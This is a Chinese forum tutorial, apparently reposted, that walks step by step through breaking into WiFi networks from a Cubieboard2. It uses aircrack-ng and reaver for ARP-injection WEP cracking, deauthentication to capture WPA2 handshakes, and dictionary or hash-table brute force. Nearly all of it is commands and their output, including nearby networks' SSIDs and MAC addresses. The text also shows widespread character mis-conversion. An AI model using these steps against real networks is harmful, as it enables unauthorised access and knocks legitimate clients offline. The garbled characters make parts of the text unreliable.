【教程】利用Cubieborad破解WiFi

本文的最終目的是介紹相關網絡安全知識, 提升你們的防範意識, 正所謂知己知彼百戰不殆.
破解他人wifi的行爲都是違法的, 與本文無關, 請知悉.

一. 軟硬件環境

硬件: cubieboard2
系統: debian (理論上基於debian的操做系統均可以, 如ubuntu, lubuntu, 等等)
無線網卡: RT3070_usb (其它無線網卡是否支持抓包以及驅動的安裝方法請自行谷歌)

因爲如下全部工具的編譯都是直接在cubieboard裏進行的, 因此要在cubieboard裏構建編譯環境:

# apt-get install gcc make
rt3070驅動安裝:

# apt-get install firmware-ralink
二. 安裝aircrack-ng

1. 下載aircrack-ng源碼

# wget http://download.aircrack-ng.org/aircrack-ng-1.1.tar.gz
# tar -zxvf aircrack-ng-1.1.tar.gz
2. 安裝必要的庫文件

# apt-get install libssl-dev
不然編譯時會報錯:

In file included from aircrack-ng.c:65:0:
crypto.h:12:26: fatal error: openssl/hmac.h: No such file or directory
compilation terminated.
make[1]: *** [aircrack-ng.o] Error 1
make[1]: Leaving directory `/home/code/wifi/aircrack-ng-1.1/src'
make: *** [all] Error 2
3. 修改編譯配置文件

# vi common.mak
搜索Werror這行, 將:
CFLAGS ?= -g -W -Wall -Werror -O3
改爲:
CFLAGS ?= -g -W -Wall -O3
不然編譯時報錯:

linux.c: In function ‘is_ndiswrapper’:
linux.c:165:17: error: variable ‘unused’ set but not used [-Werror=unused-but-set-variable]
linux.c: In function ‘linux_set_rate’:
linux.c:334:22: error: variable ‘unused’ set but not used [-Werror=unused-but-set-variable]
linux.c: In function ‘linux_set_channel’:
linux.c:807:22: error: variable ‘unused’ set but not used [-Werror=unused-but-set-variable]
linux.c: In function ‘linux_set_freq’:
linux.c:896:22: error: variable ‘unused’ set but not used [-Werror=unused-but-set-variable]
linux.c: In function ‘set_monitor’:
linux.c:1022:22: error: variable ‘unused’ set but not used [-Werror=unused-but-set-variable]
linux.c: In function ‘do_linux_open’:
linux.c:1366:12: error: variable ‘unused_str’ set but not used [-Werror=unused-but-set-variable]
linux.c:1352:15: error: variable ‘unused’ set but not used [-Werror=unused-but-set-variable]
linux.c: In function ‘get_battery_state’:
linux.c:1982:35: error: variable ‘current’ set but not used [-Werror=unused-but-set-variable]
cc1: all warnings being treated as errors
make[3]: *** [linux.o] Error 1
4. 編譯,安裝

# make
# make install
三. 安裝reaver(窮舉PIN碼方式破解工具)

1. 下載reaver源碼

http://code.google.com/p/reaver-wps/downloads/list

2. 安裝必要的庫文件

# apt-get install libpcap-dev libsqlite3-dev
不然configure的時候報錯:

checking for pcap_open_live in -lpcap... no
error: pcap library not found!
3. 編譯,安裝

# cd src
# ./configure
# make
# make install
四. 安裝minidwep-gtk(圖形界面工具, 可選)

deb包, 直接下載安裝便可, 本文只專一於純命令行破解, 圖形工具安裝步驟略

五. 破解步驟

1. 安裝wireless-tools

# apt-get install wireless-tools iw
不然在使用airmon-ng命令時會報錯:

Wireless tools not found
或者
ERROR: Neither the sysfs interface links nor the iw command is available.
2. 查看本身的無線網卡的名稱,通常是wlan0或者wifi0

# ifconfig -a
3. 開啓無線網卡監控功能

# airmon-ng start wlan0
注:wlan0爲你的無線設備名稱
這一步可能會看到提示有XXXX XXXX進程影響,不要緊,kill XXX XXX, XXX爲給出的進程號,而後從新執行上句, 直到不報錯

4. 選擇要破解的wifi, 獲取其SSID, MAC, CHANNEL

4.1 用airodump-ng掃描

# airodump-ng mon0
會列出全部掃描到的AP列表, 如:

CH 13 ][ Elapsed: 1 min ][ 2014-05-03 23:32

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:1D:0F:6A:0A:F6 -1 0 0 0 108 -1
00:23:CD:26:4A:B8 -59 19 20 0 6 54 . WEP WEP MERCURY
08:18:1A:89:D8:8C -63 19 0 0 1 54e WPA CCMP PSK ChinaNet-HbDm
EC:17:2F:B9:18:32 -77 11 0 0 6 54e. WPA2 CCMP PSK
08:10:76:6D:9B:74 -78 13 0 0 6 54e WPA2 CCMP PSK ZBH
F0:7D:68:55:AF:F4 -77 11 1 0 6 54e WPA2 CCMP PSK TL
AC:6E:1A:73:D7:85 -80 10 0 0 11 54e WPA2 CCMP PSK ChinaNet-43Bs
62:6E:1A:73:D7:86 -79 13 0 0 11 54e WPA2 CCMP PSK iTV-43Bs
A8:15:4D:13:0F:28 -78 19 1 0 11 54 . WPA2 CCMP PSK 2-703_TPLINK
38:83:45:7C:FE:00 -80 5 0 0 6 54e. WPA2 CCMP PSK xiaoer
20:DC:E6:F1:F1:82 -81 11 0 0 6 54e. WPA2 CCMP PSK XMing
6C:E8:73:5B:A3:2A -81 16 0 0 1 54e. WPA2 CCMP PSK HUANG
C8:3A:35:32:BA:88 -81 8 0 0 8 54e WPA CCMP PSK LYX
14:E6:E4:43:66:CA -81 2 0 0 4 54e. WPA2 CCMP PSK TP-LINK_4366CA
D8:15:0D:4D:18:18 -82 7 0 0 3 54e WPA2 CCMP PSK TP-LINK_805
8C:BE:BE:23:A5:AC -82 7 0 0 3 54e WPA2 CCMP PSK Xiaomi_las
9C:D2:4B:44:8B:68 -83 5 0 0 8 54e WPA CCMP PSK ChinaNet-bwwg
08:10:74:AB:61:7E -82 6 0 0 6 54 WPA TKIP PSK Netcore
00:1E:2A:67:EF:B0 -84 13 0 0 11 54 . WPA2 CCMP PSK SecondBegining
28:2C:B2:2C:A8:5C -84 20 0 0 11 54e. WPA2 CCMP PSK TP407
04:8D:38:00:A8:CB -21 47 181 0 7 54e WPA2 CCMP PSK beiyu@foxmail.com

BSSID STATION PWR Rate Lost Packets Probes

00:1D:0F:6A:0A:F6 E0:B9:A5:05:D2:3D -76 0 - 1 19 6
00:23:CD:26:4A:B8 5C:51:4F:CA:4F:09 -1 48 - 0 0 16
00:23:CD:26:4A:B8 D0:22:BE:EE:E8:A4 -80 0 - 2 20 8
04:8D:38:00:A8:CB 00:1D:E0:4B:DF:F1 -78 0e-12e 0 179 beiyu@foxmail.com
選取一個信號好的, 鏈接的客戶端活躍的就能夠.

若是想破解WEP, 咱們選取的AP信息:

SSID : MERCURY
MAC : 00:23:CD:26:4A:B8
CHANNEL : 6
ENC : WEP
若是想破解WPA/WPA2, 咱們選取的AP信息:

SSID : beiyu@foxmail.com
MAC : 04:8D:38:00:A8:CB
CHANNEL : 7
ENC : WPA2
4.2 這一步用wireless-tools或者windows下的工具WirelessMon也能夠

5. 破解WEP

5.1 抓取足夠的通訊數據包

# airodump-ng --ivs -w packet -c 6 wlan0
或者
# airodump-ng --ivs -w packet -c 6 --bssid 00:23:CD:26:4A:B8 wlan0 //能夠加--bssid參數限定只抓特定AP的數據包
參數解釋:
--ivs 這裏的設置是經過設置過濾,再也不將全部無線數據保存,而只是保存可用於破解的IVS數據報文,這樣能夠有效地縮減保存的數據包大小;
-c 這裏咱們設置目標AP的工做頻道,經過剛纔的觀察,咱們要進行攻擊的無線路由器channel爲6;
-w 後跟要保存的文件名,因此輸入本身但願保持的文件名, 這裏會生成packet-xx.ivs文件, xx是序號。後文中破解時使用ivs包可用通配符代替, 如packet-*.ivs

抓包界面以下:

CH 6 ][ Elapsed: 12 mins ][ 2014-05-04 00:23

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

04:8D:38:00:A8:CB -24 0 3 3 0 7 54e WPA2 CCMP PSK beiyu@foxmail.com
00:23:CD:26:4A:B8 -59 46 582 729 0 6 54 . WEP WEP MERCURY
EC:17:2F:B9:18:32 -75 65 458 139 1 6 54e. WPA2 CCMP PSK TARO
F0:7D:68:55:AF:F4 -78 43 461 24 0 6 54e WPA2 CCMP PSK TL
20:DC:E6:F1:F1:82 -80 33 367 0 0 6 54e. WPA2 CCMP PSK XMing
8C:21:0A:18:17:46 -78 74 513 3 0 6 54e. WPA2 CCMP PSK VincentKasim
38:83:45:7C:FE:00 -79 36 399 0 0 6 54e. WPA2 CCMP PSK xiaoer
08:10:74:AB:61:7E -82 1 261 0 0 6 54 WPA TKIP PSK Netcore
08:10:76:6D:9B:74 -82 27 277 0 0 6 54e WPA2 CCMP PSK ZBH
00:25:86:66:42:6E -83 4 19 0 0 6 54 . WEP WEP FAST_66426E
00:87:15:25:85:2C -83 90 508 18 0 6 54e WPA2 CCMP PSK RT8888
14:E6:E4:56:E2:B6 -83 0 29 0 0 6 54e. WEP WEP pig
40:16:9F:76:82:A2 -84 0 1 0 0 6 22e. WPA2 CCMP PSK WH
38:83:45:CA:42:26 -84 0 1 0 0 6 54e. WPA2 CCMP PSK tp-link n1

BSSID STATION PWR Rate Lost Packets Probes

04:8D:38:00:A8:CB 88:E3:AB:A9:23:96 -80 0 - 1e 0 152
00:23:CD:26:4A:B8 D0:22:BE:EE:E8:A4 -76 54 - 1 0 82
00:23:CD:26:4A:B8 5C:51:4F:CA:4F:09 -82 54 - 1 0 763
5.2 對目標AP使用ArpRequest注入攻擊

若鏈接着該無線路由器/AP的無線客戶端正在進行大流量的交互,好比使用迅雷、電騾進行大文件下載等,則能夠依靠單純的抓包就能夠破解出WEP密碼。
可是無線黑客們以爲這樣的等待有時候過於漫長,因而就採用了一種稱之爲「ARP Request」的方式來讀取ARP請求報文,並僞造報文再次重發出去,以便刺激AP產生更多的數據包,從而加快破解過程,
這種方法就稱之爲ArpRequest注入攻擊。輸入命令(新開一個終端)以下:

# aireplay-ng -3 -b [AP's MAC] -h [Client's MAC] mon0
參數解釋:
-3 指採用ARPRequesr注入攻擊模式;
-b 後跟AP的MAC地址,這裏就是前面咱們探測到的SSID爲TPLINK的AP的MAC;
-h 後跟客戶端的MAC地址,也就是咱們前面探測到的有效無線客戶端的MAC;

例如

# aireplay-ng -3 -b 00:23:CD:26:4A:B8 -h D0:22:BE:EE:E8:A4 mon0
回車後將會看到以下所示的讀取無線數據報文,從中獲取ARP報文的狀況出現。

The interface MAC (48:02:2A:42:52:F9) doesn't match the specified MAC (-h).
ifconfig mon0 hw ether D0:22:BE:EE:E8:A4
23:55:00 Waiting for beacon frame (BSSID: 00:23:CD:26:4A:B8) on channel 6
Saving ARP requests in replay_arp-0503-235500.cap
You should also start airodump-ng to capture replies.
Read 3943 packets (got 0 ARP requests and 13 ACKs), sent 0 packets...(0 pps)
在等待片刻以後,一旦成功截獲到ARP請求報文,咱們將會看到以下圖13所示的大量ARP報文快速交互的狀況出現。

The interface MAC (48:02:2A:42:52:F9) doesn't match the specified MAC (-h).
ifconfig mon0 hw ether D0:22:BE:EE:E8:A4
23:55:00 Waiting for beacon frame (BSSID: 00:23:CD:26:4A:B8) on channel 6
Saving ARP requests in replay_arp-0503-235500.cap
You should also start airodump-ng to capture replies.
Read 13943 packets (got 1 ARP requests and 131 ACKs), sent 12 packets...(566 pps)
Read 14045 packets (got 40 ARP requests and 231 ACKs), sent 123 packets...(566 pps)
Read 14132 packets (got 132 ARP requests and 452 ACKs), sent 234 packets...(566 pps)
Read 14212 packets (got 156 ARP requests and 645 ACKs), sent 567 packets...(566 pps)
Read 14223 packets (got 196 ARP requests and 1090 ACKs), sent 845 packets...(566 pps)
此時回到airodump-ng的界面查看,做爲MERCURY的packets欄的數字在飛速遞增, 通常該值達到1萬5千以上, 就能夠進行下一步的破解, 很複雜的密碼須要8萬以上的IVS。

5.3 使用aircrack-ng破解WEP

在抓取的無線數據報文達到了必定數量後,通常都是指IVs值達到1萬以上時,就能夠開始破解,若不能成功就等待數據報文的繼續抓取而後多試幾回。
注意,此處不須要將進行注入攻擊的終端關閉,而是另外開一個終端進行同步破解。輸入命令以下:

# aircrack-ng 捕獲的ivs文件
例如:

# aircrack-ng packet-*.ivs
關於ivs的值數量,咱們能夠從以下所示的界面中看到,當前已經接受到的IVs已經達到了1萬5千以上,aircrack-ng已經嘗試了16萬個組合。

Aircrack-ng 1.1

[00:01:01] Tested 163814 keys (got 15081 IVs)

KB depth byte(vote)
0 55/ 61 AA(13248) 39(13212) BC(13212) CE(13212) 79(13208) EB(13200) 04(13128) 61(13124) 57(13088) 4F(13060) C9(13048) 75(13024) 8F(12984) A4(12984)
1 12/ 14 49(14740) 88(14628) 86(14564) D8(14520) 7C(14272) 5B(14192) 22(14160) 10(14120) 05(14040) 0E(14012) A8(13976) 87(13932) E2(13828) 5D(13796)
2 38/ 2 09(13724) ED(13608) 40(13600) 24(13572) 7E(13572) C0(13572) 50(13560) 06(13492) 97(13432) C6(13432) 23(13392) 0B(13388) B2(13316) AB(13312)
3 2/ 3 9E(16764) A8(15876) 7A(15808) 12(15800) 4B(15740) 28(15440) 53(15368) 16(15036) 69(14936) 5E(14920) 91(14892) 74(14780) 45(14772) 99(14604)
4 16/ 4 7B(14488) 4A(14384) F1(14308) 86(14228) A1(14228) 5C(14128) 17(14120) 6C(14120) 7F(14088) 02(14084) 31(14052) BF(14016) C1(14008) 0C(14004)

KEY FOUND! [ 31:32:33:34:35 ] (ASCII: 12345 )
Decrypted corretly: 100%
注意: 高強度複雜密碼破解成功依賴於更多的IVs, 如13位複雜密碼須要8萬多IVs.

6. 破解WPA/WPA2

6.1 開始監控目標AP

獲取與其進行通訊的Client’s MAC, 命令格式:

# airodump-ng -w handshake -c [AP‘s CHANNEL] mon0
# airodump-ng -w handshake -c [AP‘s CHANNEL] --bssid [AP‘s MAC] mon0 //能夠加--bssid參數限定只抓特定AP的數據包
例如:

# airodump-ng -w handshake -c 7 --bssid 04:8D:38:00:A8:CB mon0
輸出以下所示:

CH 7 ][ Elapsed: 56 s ][ 2014-05-03 20:54

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

04:8D:38:00:A8:CB -2 100 510 3216 3 7 54e WPA2 CCMP PSK beiyu@foxmail.com

BSSID STATION PWR Rate Lost Packets Probes

04:8D:38:00:A8:CB 88:E3:AB:A9:23:96 -74 0 - 1e 16 47
04:8D:38:00:A8:CB 00:1D:E0:4B:DF:F1 -74 0e-12e 51 3412
6.2 抓握手包

爲了得到破解所需的WPA-PSK握手驗證的整個完整數據包,黑客們將會發送一種稱之爲「Deauth」的數據包來將已經鏈接至無線路由器的合法無線客戶端強制斷開,
此時,客戶端就會自動從新鏈接無線路由器,黑客們也就有機會捕獲到包含WPA-PSK握手驗證的完整數據包了。

第四步咱們已經抓到兩個Client客戶端的MAC地址,從裏面隨便選個Client(最好選擇活躍些的)。
再打開一個新的終端(上一個終端不要關閉,後面還須要用到), 在新終端中輸入命令, 格式爲:

# aireplay-ng -0 20 -a [AP’s MAC] -c [CLIENT’s MAC] mon0
例如:
# aireplay-ng -0 20 -a 04:8D:38:00:A8:CB -c 88:E3:AB:A9:23:96 mon0
查看第一個終端中是否出現了以下所示的標誌WAP Handshake:

CH 7 ][ Elapsed: 6 mins ][ 2014-05-03 21:04 ][ WPA handshake: 04:8D:38:00:A8:CB <== 這一行出現WPA handshake說明抓到了握手包!!

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

04:8D:38:00:A8:CB -28 100 3346 30338 31 7 54e WPA2 CCMP PSK beiyu@foxmail.com

BSSID STATION PWR Rate Lost Packets Probes

04:8D:38:00:A8:CB 00:1D:E0:4B:DF:F1 -72 0e-12e 43 31348
04:8D:38:00:A8:CB 88:E3:AB:A9:23:96 -74 11e- 1 57 14993
若是出現了,那麼恭喜你離成功已經不遠了。抓到的握手包會保存在當前目錄下, 命名規則是handshake-xx.cap, xx是抓到的握手包的序號(由於可能抓到不止一個握手包)
若是沒有出現就繼續重複aireplay-ng的命令,直到出現握手狀態。

6.3 暴力破解握手包

6.3.1 直接跑字典(推薦方式, 簡單, 可是速度比較慢)

# aircrack-ng -w [password.txt] -b [AP’s MAC] [handshake-xx.cap]
其中: password.txt 爲咱們須要預置的字典文件(網上搜搜就有了)。
AP’s MAC 爲咱們以前選取的AP的MAC
handshake-xx.cap 爲咱們上一步抓到的握手包

Cubieboard2 跑字典的速度大概是每秒200~300個, 跟通常的臺式機仍是有6,7倍的差距的, 可見Arm與X86架構不是同一個級別上的.因爲跑字典時CPU滿載, 發熱量大, 建議給Cubieboard CPU上加裝散熱片.

例如:

# aircrack-ng -w password.txt -b 04:8D:38:00:A8:CB handshake-01.cap
6.3.2 利用字典文件生成Hash表數據庫, 直接跑數據庫(生成的Hash數據庫很大, 生成過程速度慢, 可是破解速度快)
新建ssid.txt, 把AP的SSID寫入其中, 而後執行:

# airolib-ng hashdb import ascii essid ssid.txt
# airolib-ng hashdb import ascii passwd password.txt
# airolib-ng hashdb clean all
# airolib-ng hashdb batch
檢查一下:

# airolib-ng hashdb stats
跑Hash數據庫

# aircrack-ng -r hashdb handshake-01.cap
以上兩種暴力破解方式任意一種破解成功後都會有以下提示:

Aircrack-ng 1.1

[00:01:23] 23092 keys tested (277.54 k/s)

KEY FOUND! [ abababab ]

Master Key : 45 0A 1F 5F EE 54 78 B8 00 97 DA 2E F2 89 D3 57
06 98 13 0D 62 66 E5 2B B6 1F 2A 6C BF 2F 88 2C

Transient Key : 70 52 7D 66 0C B7 52 F6 08 8C 0C 32 5D C0 B3 54
41 24 93 84 06 6D 37 78 16 8F 8F 0D 09 4D 51 0D
B2 31 31 96 73 77 62 17 B3 AD 72 06 41 F1 4C 05
4B B5 10 F5 3E E2 41 27 B4 52 08 70 B4 85 AC 0E

EAPOL HMAC : 81 B7 0E BB 19 AB 4B 24 E5 97 69 14 AD 46 B2 62
Tags: Linux, Tools

------------------ Have a nice day! --------------------


原文做者:beiyuuyieb
原文連接:http://cubie.cc/forum.php?mod=vi ... %A0%B4%E8%A7%A3WIFIphp

相關文章
相關標籤/搜索